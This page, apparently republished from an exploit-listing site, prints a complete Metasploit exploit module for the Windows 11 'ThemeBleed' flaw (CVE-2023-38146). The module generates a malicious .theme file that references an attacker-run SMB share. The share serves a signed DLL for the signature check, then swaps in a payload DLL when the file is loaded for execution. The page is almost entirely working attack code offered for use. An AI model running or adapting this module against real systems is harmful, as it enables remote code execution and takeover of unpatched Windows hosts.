Themebleed Windows 11 Themes Arbitrary Code Execution
2024-1-6 17:33:44 Author: cxsecurity.com(查看原文) 阅读量:14 收藏

Themebleed Windows 11 Themes Arbitrary Code Execution

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::SMB::Server::Share def initialize(info = {}) super( update_info( info, 'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146', 'Description' => %q{ When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by opening the file for reading and verifying the signature before opening the file for execution. Because this action is performed in two discrete operations, it opens the procedure for a time of check to time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name when the host intends to load/execute the dll. }, 'DisclosureDate' => '2023-09-13', 'Author' => [ 'gabe_k', # Discovery/PoC 'bwatters-r7', # msf exploit 'Spencer McIntyre' # msf exploit ], 'References' => [ ['CVE', '2023-38146'], ['URL', 'https://exploits.forsale/themebleed/'], ['URL', 'https://github.com/gabe-k/themebleed/tree/main'] ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X64, 'Targets' => [ [ 'Windows', {} ], ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS], 'AKA' => ['ThemeBleed'] }, 'DefaultOptions' => { 'DisablePayloadHandler' => false } ) ) register_options([ OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/), OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/), OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]) ]) deregister_options( 'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity 'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity 'FOLDER_NAME' ) end def file_format_filename datastore['THEME_FILE_NAME'] end def setup super @file = File.binread(datastore['STYLE_FILE']) begin pe = Rex::PeParsey::Pe.new_from_string(@file) rescue Rex::PeParsey::PeError => e fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}") end unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva) fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.') end @file_version_offset = pe.rva_to_file_offset(rva) @file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME'] @file_name << '.msstyles' unless @file_name.end_with?('.msstyles') end def primer payload_dll = generate_payload_dll max_length = [payload_dll.length, @file.length].max # make sure that the lengths are the same by padding the smaller to the length of the larger @file.ljust(max_length, "\x00".b) payload_dll.ljust(max_length, "\x00".b) virtual_disk = service.shares[@share] @service = service virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file) virtual_disk.add(virtual_file) # install this hook for create requests to set the thread-local file content virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request| next unless request.name.read_now!.encode.ends_with?('_vrf.dll') if request.desired_access.execute == 1 virtual_file.tl_content = payload_dll else virtual_file.tl_content = @file end nil end file_create(make_theme) end def get_file_contents(client:) print_status("Sending file to #{client.peerhost}") new_version = [999].pack('v') @file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...] end def make_theme <<~THEME [Theme] DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060 [Control Panel\\Desktop] Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg TileWallpaper=0 WallpaperStyle=10 [VisualStyles] Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name} ColorStyle=NormalColor Size=NormalSize [MasterThemeSelector] MTSM=RJSPBS THEME end class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile def initialize(*args, **kwargs) super @default_content = @content @tl_content = {} @tl_content.compare_by_identity end def open(mode = 'r', &block) @content = tl_content super end def tl_content=(content) @tl_content[Thread.current] = content end def tl_content @tl_content.fetch(Thread.current, @default_content) end end end



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024010019
如有侵权请联系:admin#unsafe.sh